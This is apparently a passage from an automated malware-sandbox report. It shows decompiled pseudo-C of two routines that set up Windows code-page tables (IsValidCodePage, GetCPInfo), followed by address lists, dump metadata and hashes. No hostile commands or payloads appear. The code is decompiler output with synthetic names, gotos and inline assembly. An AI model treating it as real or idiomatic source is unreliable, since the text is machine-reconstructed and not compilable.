                                                                                                                                                                                                                                                    					_t93 =  &_v1814;
                                                                                                                                                                                                                                                    					_v264 = 0x20;
                                                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                                                    						_t108 = _t75;
                                                                                                                                                                                                                                                    						if(_t75 == 0) {
                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t95 =  *(_t93 + 1) & 0x000000ff;
                                                                                                                                                                                                                                                    						_t76 = _t75 & 0x000000ff;
                                                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                                                    							__eflags = _t76 - _t95;
                                                                                                                                                                                                                                                    							if(_t76 > _t95) {
                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							__eflags = _t76 - 0x100;
                                                                                                                                                                                                                                                    							if(_t76 < 0x100) {
                                                                                                                                                                                                                                                    								 *((char*)(_t102 + _t76 - 0x104)) = 0x20;
                                                                                                                                                                                                                                                    								_t76 = _t76 + 1;
                                                                                                                                                                                                                                                    								__eflags = _t76;
                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t93 = _t93 + 2;
                                                                                                                                                                                                                                                    						__eflags = _t93;
                                                                                                                                                                                                                                                    						_t75 =  *_t93;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					E010DA4FD(0, _t95, 0x100, _t101, _t108, 0, 1,  &_v264, 0x100,  &_v1800,  *(_t101 + 4), 0);
                                                                                                                                                                                                                                                    					E010DCAA6(0x100, _t101, _t108, 0,  *((intOrPtr*)(_t101 + 0x21c)), 0x100,  &_v264, 0x100,  &_v520, 0x100,  *(_t101 + 4), 0); // executed
                                                                                                                                                                                                                                                    					E010DCAA6(0x100, _t101, _t108, 0,  *((intOrPtr*)(_t101 + 0x21c)), 0x200,  &_v264, 0x100,  &_v776, 0x100,  *(_t101 + 4), 0);
                                                                                                                                                                                                                                                    					_t94 = 0;
                                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                                    						_t86 =  *(_t102 + _t94 * 2 - 0x704) & 0x0000ffff;
                                                                                                                                                                                                                                                    						if((_t86 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                    							__eflags = _t86 & 0x00000002;
                                                                                                                                                                                                                                                    							if((_t86 & 0x00000002) == 0) {
                                                                                                                                                                                                                                                    								 *((char*)(_t101 + _t94 + 0x119)) = 0;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								_t37 = _t101 + _t94 + 0x19;
                                                                                                                                                                                                                                                    								 *_t37 =  *(_t101 + _t94 + 0x19) | 0x00000020;
                                                                                                                                                                                                                                                    								__eflags =  *_t37;
                                                                                                                                                                                                                                                    								_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x304));
                                                                                                                                                                                                                                                    								goto L15;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							 *(_t101 + _t94 + 0x19) =  *(_t101 + _t94 + 0x19) | 0x00000010;
                                                                                                                                                                                                                                                    							_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x204));
                                                                                                                                                                                                                                                    							L15:
                                                                                                                                                                                                                                                    							 *((char*)(_t101 + _t94 + 0x119)) = _t87;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t94 = _t94 + 1;
                                                                                                                                                                                                                                                    					} while (_t94 < 0x100);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return E010DDC5F(_v8 ^ _t102);
                                                                                                                                                                                                                                                    			}































                                                                                                                                                                                                                                                    0x010db225
                                                                                                                                                                                                                                                    0x010db230
                                                                                                                                                                                                                                                    0x010db237
                                                                                                                                                                                                                                                    0x010db23c
                                                                                                                                                                                                                                                    0x010db259
                                                                                                                                                                                                                                                    0x010db351
                                                                                                                                                                                                                                                    0x010db357
                                                                                                                                                                                                                                                    0x010db359
                                                                                                                                                                                                                                                    0x010db35a
                                                                                                                                                                                                                                                    0x010db35a
                                                                                                                                                                                                                                                    0x010db35c
                                                                                                                                                                                                                                                    0x010db362
                                                                                                                                                                                                                                                    0x010db362
                                                                                                                                                                                                                                                    0x010db364
                                                                                                                                                                                                                                                    0x010db366
                                                                                                                                                                                                                                                    0x010db36f
                                                                                                                                                                                                                                                    0x010db372
                                                                                                                                                                                                                                                    0x010db37e
                                                                                                                                                                                                                                                    0x010db385
                                                                                                                                                                                                                                                    0x010db395
                                                                                                                                                                                                                                                    0x010db387
                                                                                                                                                                                                                                                    0x010db387
                                                                                                                                                                                                                                                    0x010db38a
                                                                                                                                                                                                                                                    0x010db38a
                                                                                                                                                                                                                                                    0x010db38a
                                                                                                                                                                                                                                                    0x010db38e
                                                                                                                                                                                                                                                    0x010db38e
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010db38e
                                                                                                                                                                                                                                                    0x010db374
                                                                                                                                                                                                                                                    0x010db374
                                                                                                                                                                                                                                                    0x010db379
                                                                                                                                                                                                                                                    0x010db379
                                                                                                                                                                                                                                                    0x010db391
                                                                                                                                                                                                                                                    0x010db391
                                                                                                                                                                                                                                                    0x010db391
                                                                                                                                                                                                                                                    0x010db397
                                                                                                                                                                                                                                                    0x010db39d
                                                                                                                                                                                                                                                    0x010db3a3
                                                                                                                                                                                                                                                    0x010db3a4
                                                                                                                                                                                                                                                    0x010db3a4
                                                                                                                                                                                                                                                    0x010db25f
                                                                                                                                                                                                                                                    0x010db25f
                                                                                                                                                                                                                                                    0x010db261
                                                                                                                                                                                                                                                    0x010db261
                                                                                                                                                                                                                                                    0x010db268
                                                                                                                                                                                                                                                    0x010db269
                                                                                                                                                                                                                                                    0x010db26d
                                                                                                                                                                                                                                                    0x010db273
                                                                                                                                                                                                                                                    0x010db279
                                                                                                                                                                                                                                                    0x010db2a1
                                                                                                                                                                                                                                                    0x010db2a1
                                                                                                                                                                                                                                                    0x010db2a3
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010db282
                                                                                                                                                                                                                                                    0x010db286
                                                                                                                                                                                                                                                    0x010db298
                                                                                                                                                                                                                                                    0x010db298
                                                                                                                                                                                                                                                    0x010db29a
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010db28b
                                                                                                                                                                                                                                                    0x010db28d
                                                                                                                                                                                                                                                    0x010db28f
                                                                                                                                                                                                                                                    0x010db297
                                                                                                                                                                                                                                                    0x010db297
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010db297
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010db28d
                                                                                                                                                                                                                                                    0x010db29c
                                                                                                                                                                                                                                                    0x010db29c
                                                                                                                                                                                                                                                    0x010db29f
                                                                                                                                                                                                                                                    0x010db29f
                                                                                                                                                                                                                                                    0x010db2bb
                                                                                                                                                                                                                                                    0x010db2dc
                                                                                                                                                                                                                                                    0x010db304
                                                                                                                                                                                                                                                    0x010db30c
                                                                                                                                                                                                                                                    0x010db30e
                                                                                                                                                                                                                                                    0x010db30e
                                                                                                                                                                                                                                                    0x010db318
                                                                                                                                                                                                                                                    0x010db328
                                                                                                                                                                                                                                                    0x010db32a
                                                                                                                                                                                                                                                    0x010db341
                                                                                                                                                                                                                                                    0x010db32c
                                                                                                                                                                                                                                                    0x010db32c
                                                                                                                                                                                                                                                    0x010db32c
                                                                                                                                                                                                                                                    0x010db32c
                                                                                                                                                                                                                                                    0x010db331
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010db331
                                                                                                                                                                                                                                                    0x010db31a
                                                                                                                                                                                                                                                    0x010db31a
                                                                                                                                                                                                                                                    0x010db31f
                                                                                                                                                                                                                                                    0x010db338
                                                                                                                                                                                                                                                    0x010db338
                                                                                                                                                                                                                                                    0x010db338
                                                                                                                                                                                                                                                    0x010db348
                                                                                                                                                                                                                                                    0x010db349
                                                                                                                                                                                                                                                    0x010db34d
                                                                                                                                                                                                                                                    0x010db3b8

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Info
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1807457897-3916222277
                                                                                                                                                                                                                                                    • Opcode ID: ffbce755fb4f27ea6fbcd476f4e7358b0db1c29a962e93684c9d9008cfa90d59
                                                                                                                                                                                                                                                    • Instruction ID: 263e3c1a2f1dca449a007384f24ea68f44a46cd824184c0fc6609004cf8ffad6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ffbce755fb4f27ea6fbcd476f4e7358b0db1c29a962e93684c9d9008cfa90d59
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A41F9715043489BDF228E688C84AFEBBE9EB56304F1444ECD9CA87142D635AA45DF61
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 154 10db57a-10db59e call 10db14d 157 10db5ae-10db5b5 154->157 158 10db5a0-10db5a9 call 10db1c0 154->158 160 10db5b8-10db5be 157->160 165 10db75b-10db76a call 10ddc5f 158->165 162 10db6ae-10db6cd call 10df070 160->162 163 10db5c4-10db5d0 160->163 172 10db6d0-10db6d5 162->172 163->160 166 10db5d2-10db5d8 163->166 169 10db5de-10db5e4 166->169 170 10db6a6-10db6a9 166->170 169->170 174 10db5ea-10db5f6 IsValidCodePage 169->174 171 10db75a 170->171 171->165 175 10db70c-10db716 172->175 176 10db6d7-10db6dc 172->176 174->170 177 10db5fc-10db609 GetCPInfo 174->177 175->172 182 10db718-10db73f call 10db10f 175->182 178 10db6de-10db6e4 176->178 179 10db709 176->179 180 10db60f-10db630 call 10df070 177->180 181 10db693-10db699 177->181 183 10db6fd-10db6ff 178->183 179->175 193 10db683 180->193 194 10db632-10db639 180->194 181->170 185 10db69b-10db6a1 call 10db1c0 181->185 196 10db740-10db74f 182->196 187 10db6e6-10db6ec 183->187 188 10db701-10db707 183->188 201 10db757-10db758 185->201 187->188 192 10db6ee-10db6f9 187->192 188->176 188->179 192->183 198 10db686-10db68e 193->198 199 10db65c-10db65f 194->199 200 10db63b-10db640 194->200 196->196 197 10db751-10db752 call 10db225 196->197 197->201 198->197 204 10db664-10db66b 199->204 200->199 202 10db642-10db648 200->202 201->171 205 10db650-10db652 202->205 204->204 206 10db66d-10db681 call 10db10f 204->206 207 10db64a-10db64f 205->207 208 10db654-10db65a 205->208 206->198 207->205 208->199 208->200
                                                                                                                                                                                                                                                    C-Code - Quality: 78%
                                                                                                                                                                                                                                                    			E010DB57A(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                    				char _v22;
                                                                                                                                                                                                                                                    				struct _cpinfo _v28;
                                                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                                                    				signed int _t48;
                                                                                                                                                                                                                                                    				int _t51;
                                                                                                                                                                                                                                                    				signed int _t54;
                                                                                                                                                                                                                                                    				signed int _t55;
                                                                                                                                                                                                                                                    				short _t58;
                                                                                                                                                                                                                                                    				signed char _t62;
                                                                                                                                                                                                                                                    				signed int _t63;
                                                                                                                                                                                                                                                    				signed char* _t72;
                                                                                                                                                                                                                                                    				signed char* _t73;
                                                                                                                                                                                                                                                    				int _t78;
                                                                                                                                                                                                                                                    				signed int _t81;
                                                                                                                                                                                                                                                    				signed char* _t82;
                                                                                                                                                                                                                                                    				short* _t83;
                                                                                                                                                                                                                                                    				int _t87;
                                                                                                                                                                                                                                                    				signed char _t88;
                                                                                                                                                                                                                                                    				signed int _t89;
                                                                                                                                                                                                                                                    				signed int _t91;
                                                                                                                                                                                                                                                    				signed int _t92;
                                                                                                                                                                                                                                                    				int _t94;
                                                                                                                                                                                                                                                    				int _t95;
                                                                                                                                                                                                                                                    				intOrPtr _t98;
                                                                                                                                                                                                                                                    				signed int _t99;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t48 =  *0x116dd74; // 0x2e3e64ca
                                                                                                                                                                                                                                                    				_v8 = _t48 ^ _t99;
                                                                                                                                                                                                                                                    				_t98 = _a8;
                                                                                                                                                                                                                                                    				_t78 = E010DB14D(__eflags, _a4);
                                                                                                                                                                                                                                                    				if(_t78 != 0) {
                                                                                                                                                                                                                                                    					_t94 = 0;
                                                                                                                                                                                                                                                    					__eflags = 0;
                                                                                                                                                                                                                                                    					_t81 = 0;
                                                                                                                                                                                                                                                    					_t51 = 0;
                                                                                                                                                                                                                                                    					_v32 = 0;
                                                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                                                    						__eflags =  *((intOrPtr*)(_t51 + 0x116d7e8)) - _t78;
                                                                                                                                                                                                                                                    						if( *((intOrPtr*)(_t51 + 0x116d7e8)) == _t78) {
                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t81 = _t81 + 1;
                                                                                                                                                                                                                                                    						_t51 = _t51 + 0x30;
                                                                                                                                                                                                                                                    						_v32 = _t81;
                                                                                                                                                                                                                                                    						__eflags = _t51 - 0xf0;
                                                                                                                                                                                                                                                    						if(_t51 < 0xf0) {
                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							__eflags = _t78 - 0xfde8;
                                                                                                                                                                                                                                                    							if(_t78 == 0xfde8) {
                                                                                                                                                                                                                                                    								L23:
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								__eflags = _t78 - 0xfde9;
                                                                                                                                                                                                                                                    								if(_t78 == 0xfde9) {
                                                                                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									_t51 = IsValidCodePage(_t78 & 0x0000ffff);
                                                                                                                                                                                                                                                    									__eflags = _t51;
                                                                                                                                                                                                                                                    									if(_t51 == 0) {
                                                                                                                                                                                                                                                    										goto L23;
                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                    										_t51 = GetCPInfo(_t78,  &_v28);
                                                                                                                                                                                                                                                    										__eflags = _t51;
                                                                                                                                                                                                                                                    										if(_t51 == 0) {
                                                                                                                                                                                                                                                    											__eflags =  *0x116e17c - _t94; // 0x0
                                                                                                                                                                                                                                                    											if(__eflags == 0) {
                                                                                                                                                                                                                                                    												goto L23;
                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                    												E010DB1C0(_t98);
                                                                                                                                                                                                                                                    												goto L37;
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                    											E010DF070(_t94, _t98 + 0x18, _t94, 0x101);
                                                                                                                                                                                                                                                    											 *(_t98 + 4) = _t78;
                                                                                                                                                                                                                                                    											 *(_t98 + 0x21c) = _t94;
                                                                                                                                                                                                                                                    											_t78 = 1;
                                                                                                                                                                                                                                                    											__eflags = _v28 - 1;
                                                                                                                                                                                                                                                    											if(_v28 <= 1) {
                                                                                                                                                                                                                                                    												 *(_t98 + 8) = _t94;
                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                    												__eflags = _v22;
                                                                                                                                                                                                                                                    												_t72 =  &_v22;
                                                                                                                                                                                                                                                    												if(_v22 != 0) {
                                                                                                                                                                                                                                                    													while(1) {
                                                                                                                                                                                                                                                    														_t88 = _t72[1];
                                                                                                                                                                                                                                                    														__eflags = _t88;
                                                                                                                                                                                                                                                    														if(_t88 == 0) {
                                                                                                                                                                                                                                                    															goto L16;
                                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                                    														_t91 = _t88 & 0x000000ff;
                                                                                                                                                                                                                                                    														_t89 =  *_t72 & 0x000000ff;
                                                                                                                                                                                                                                                    														while(1) {
                                                                                                                                                                                                                                                    															__eflags = _t89 - _t91;
                                                                                                                                                                                                                                                    															if(_t89 > _t91) {
                                                                                                                                                                                                                                                    																break;
                                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                                    															 *(_t98 + _t89 + 0x19) =  *(_t98 + _t89 + 0x19) | 0x00000004;
                                                                                                                                                                                                                                                    															_t89 = _t89 + 1;
                                                                                                                                                                                                                                                    															__eflags = _t89;
                                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                                    														_t72 =  &(_t72[2]);
                                                                                                                                                                                                                                                    														__eflags =  *_t72;
                                                                                                                                                                                                                                                    														if( *_t72 != 0) {
                                                                                                                                                                                                                                                    															continue;
                                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                                    														goto L16;
                                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                    												L16:
                                                                                                                                                                                                                                                    												_t73 = _t98 + 0x1a;
                                                                                                                                                                                                                                                    												_t87 = 0xfe;
                                                                                                                                                                                                                                                    												do {
                                                                                                                                                                                                                                                    													 *_t73 =  *_t73 | 0x00000008;
                                                                                                                                                                                                                                                    													_t73 =  &(_t73[1]);
                                                                                                                                                                                                                                                    													_t87 = _t87 - 1;
                                                                                                                                                                                                                                                    													__eflags = _t87;
                                                                                                                                                                                                                                                    												} while (_t87 != 0);
                                                                                                                                                                                                                                                    												 *(_t98 + 0x21c) = E010DB10F( *(_t98 + 4));
                                                                                                                                                                                                                                                    												 *(_t98 + 8) = _t78;
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    											_t95 = _t98 + 0xc;
                                                                                                                                                                                                                                                    											asm("stosd");
                                                                                                                                                                                                                                                    											asm("stosd");
                                                                                                                                                                                                                                                    											asm("stosd");
                                                                                                                                                                                                                                                    											L36:
                                                                                                                                                                                                                                                    											E010DB225(_t78, _t91, _t95, _t98, _t98); // executed
                                                                                                                                                                                                                                                    											L37:
                                                                                                                                                                                                                                                    											__eflags = 0;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						goto L39;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					E010DF070(_t94, _t98 + 0x18, _t94, 0x101);
                                                                                                                                                                                                                                                    					_t54 = _v32 * 0x30;
                                                                                                                                                                                                                                                    					__eflags = _t54;
                                                                                                                                                                                                                                                    					_v36 = _t54;
                                                                                                                                                                                                                                                    					_t55 = _t54 + 0x116d7f8;
                                                                                                                                                                                                                                                    					_v32 = _t55;
                                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                                    						__eflags =  *_t55;
                                                                                                                                                                                                                                                    						_t82 = _t55;
                                                                                                                                                                                                                                                    						if( *_t55 != 0) {
                                                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                                                    								_t62 = _t82[1];
                                                                                                                                                                                                                                                    								__eflags = _t62;
                                                                                                                                                                                                                                                    								if(_t62 == 0) {
                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_t92 =  *_t82 & 0x000000ff;
                                                                                                                                                                                                                                                    								_t63 = _t62 & 0x000000ff;
                                                                                                                                                                                                                                                    								while(1) {
                                                                                                                                                                                                                                                    									__eflags = _t92 - _t63;
                                                                                                                                                                                                                                                    									if(_t92 > _t63) {
                                                                                                                                                                                                                                                    										break;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									__eflags = _t92 - 0x100;
                                                                                                                                                                                                                                                    									if(_t92 < 0x100) {
                                                                                                                                                                                                                                                    										_t31 = _t94 + 0x116d7e4; // 0x8040201
                                                                                                                                                                                                                                                    										 *(_t98 + _t92 + 0x19) =  *(_t98 + _t92 + 0x19) |  *_t31;
                                                                                                                                                                                                                                                    										_t92 = _t92 + 1;
                                                                                                                                                                                                                                                    										__eflags = _t92;
                                                                                                                                                                                                                                                    										_t63 = _t82[1] & 0x000000ff;
                                                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_t82 =  &(_t82[2]);
                                                                                                                                                                                                                                                    								__eflags =  *_t82;
                                                                                                                                                                                                                                                    								if( *_t82 != 0) {
                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_t55 = _v32;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t94 = _t94 + 1;
                                                                                                                                                                                                                                                    						_t55 = _t55 + 8;
                                                                                                                                                                                                                                                    						_v32 = _t55;
                                                                                                                                                                                                                                                    						__eflags = _t94 - 4;
                                                                                                                                                                                                                                                    					} while (_t94 < 4);
                                                                                                                                                                                                                                                    					 *(_t98 + 4) = _t78;
                                                                                                                                                                                                                                                    					 *(_t98 + 8) = 1;
                                                                                                                                                                                                                                                    					 *(_t98 + 0x21c) = E010DB10F(_t78);
                                                                                                                                                                                                                                                    					_t83 = _t98 + 0xc;
                                                                                                                                                                                                                                                    					_t91 = _v36 + 0x116d7ec;
                                                                                                                                                                                                                                                    					_t95 = 6;
                                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                                    						_t58 =  *_t91;
                                                                                                                                                                                                                                                    						_t91 = _t91 + 2;
                                                                                                                                                                                                                                                    						 *_t83 = _t58;
                                                                                                                                                                                                                                                    						_t83 = _t83 + 2;
                                                                                                                                                                                                                                                    						_t95 = _t95 - 1;
                                                                                                                                                                                                                                                    						__eflags = _t95;
                                                                                                                                                                                                                                                    					} while (_t95 != 0);
                                                                                                                                                                                                                                                    					goto L36;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					E010DB1C0(_t98);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				L39:
                                                                                                                                                                                                                                                    				return E010DDC5F(_v8 ^ _t99);
                                                                                                                                                                                                                                                    			}






























                                                                                                                                                                                                                                                    0x010db582
                                                                                                                                                                                                                                                    0x010db589
                                                                                                                                                                                                                                                    0x010db591
                                                                                                                                                                                                                                                    0x010db599
                                                                                                                                                                                                                                                    0x010db59e
                                                                                                                                                                                                                                                    0x010db5af
                                                                                                                                                                                                                                                    0x010db5af
                                                                                                                                                                                                                                                    0x010db5b1
                                                                                                                                                                                                                                                    0x010db5b3
                                                                                                                                                                                                                                                    0x010db5b5
                                                                                                                                                                                                                                                    0x010db5b8
                                                                                                                                                                                                                                                    0x010db5b8
                                                                                                                                                                                                                                                    0x010db5be
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010db5c4
                                                                                                                                                                                                                                                    0x010db5c5
                                                                                                                                                                                                                                                    0x010db5c8
                                                                                                                                                                                                                                                    0x010db5cb
                                                                                                                                                                                                                                                    0x010db5d0
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010db5d2
                                                                                                                                                                                                                                                    0x010db5d2
                                                                                                                                                                                                                                                    0x010db5d8
                                                                                                                                                                                                                                                    0x010db6a6
                                                                                                                                                                                                                                                    0x010db5de
                                                                                                                                                                                                                                                    0x010db5de
                                                                                                                                                                                                                                                    0x010db5e4
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010db5ea
                                                                                                                                                                                                                                                    0x010db5ee
                                                                                                                                                                                                                                                    0x010db5f4
                                                                                                                                                                                                                                                    0x010db5f6
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010db5fc
                                                                                                                                                                                                                                                    0x010db601
                                                                                                                                                                                                                                                    0x010db607
                                                                                                                                                                                                                                                    0x010db609
                                                                                                                                                                                                                                                    0x010db693
                                                                                                                                                                                                                                                    0x010db699
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010db69b
                                                                                                                                                                                                                                                    0x010db69c
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010db69c
                                                                                                                                                                                                                                                    0x010db60f
                                                                                                                                                                                                                                                    0x010db619
                                                                                                                                                                                                                                                    0x010db61e
                                                                                                                                                                                                                                                    0x010db626
                                                                                                                                                                                                                                                    0x010db62c
                                                                                                                                                                                                                                                    0x010db62d
                                                                                                                                                                                                                                                    0x010db630
                                                                                                                                                                                                                                                    0x010db683
                                                                                                                                                                                                                                                    0x010db632
                                                                                                                                                                                                                                                    0x010db632
                                                                                                                                                                                                                                                    0x010db636
                                                                                                                                                                                                                                                    0x010db639
                                                                                                                                                                                                                                                    0x010db63b
                                                                                                                                                                                                                                                    0x010db63b
                                                                                                                                                                                                                                                    0x010db63e
                                                                                                                                                                                                                                                    0x010db640
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010db642
                                                                                                                                                                                                                                                    0x010db645
                                                                                                                                                                                                                                                    0x010db650
                                                                                                                                                                                                                                                    0x010db650
                                                                                                                                                                                                                                                    0x010db652
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010db64a
                                                                                                                                                                                                                                                    0x010db64f
                                                                                                                                                                                                                                                    0x010db64f
                                                                                                                                                                                                                                                    0x010db64f
                                                                                                                                                                                                                                                    0x010db654
                                                                                                                                                                                                                                                    0x010db657
                                                                                                                                                                                                                                                    0x010db65a
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010db65a
                                                                                                                                                                                                                                                    0x010db63b
                                                                                                                                                                                                                                                    0x010db65c
                                                                                                                                                                                                                                                    0x010db65c
                                                                                                                                                                                                                                                    0x010db65f
                                                                                                                                                                                                                                                    0x010db664
                                                                                                                                                                                                                                                    0x010db664
                                                                                                                                                                                                                                                    0x010db667
                                                                                                                                                                                                                                                    0x010db668
                                                                                                                                                                                                                                                    0x010db668
                                                                                                                                                                                                                                                    0x010db668
                                                                                                                                                                                                                                                    0x010db678
                                                                                                                                                                                                                                                    0x010db67e
                                                                                                                                                                                                                                                    0x010db67e
                                                                                                                                                                                                                                                    0x010db688
                                                                                                                                                                                                                                                    0x010db68b
                                                                                                                                                                                                                                                    0x010db68c
                                                                                                                                                                                                                                                    0x010db68d
                                                                                                                                                                                                                                                    0x010db751
                                                                                                                                                                                                                                                    0x010db752
                                                                                                                                                                                                                                                    0x010db757
                                                                                                                                                                                                                                                    0x010db758
                                                                                                                                                                                                                                                    0x010db758
                                                                                                                                                                                                                                                    0x010db609
                                                                                                                                                                                                                                                    0x010db5f6
                                                                                                                                                                                                                                                    0x010db5e4
                                                                                                                                                                                                                                                    0x010db5d8
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010db75a
                                                                                                                                                                                                                                                    0x010db6b8
                                                                                                                                                                                                                                                    0x010db6c0
                                                                                                                                                                                                                                                    0x010db6c0
                                                                                                                                                                                                                                                    0x010db6c4
                                                                                                                                                                                                                                                    0x010db6c7
                                                                                                                                                                                                                                                    0x010db6cd
                                                                                                                                                                                                                                                    0x010db6d0
                                                                                                                                                                                                                                                    0x010db6d0
                                                                                                                                                                                                                                                    0x010db6d3
                                                                                                                                                                                                                                                    0x010db6d5
                                                                                                                                                                                                                                                    0x010db6d7
                                                                                                                                                                                                                                                    0x010db6d7
                                                                                                                                                                                                                                                    0x010db6da
                                                                                                                                                                                                                                                    0x010db6dc
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010db6de
                                                                                                                                                                                                                                                    0x010db6e1
                                                                                                                                                                                                                                                    0x010db6fd
                                                                                                                                                                                                                                                    0x010db6fd
                                                                                                                                                                                                                                                    0x010db6ff
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010db6e6
                                                                                                                                                                                                                                                    0x010db6ec
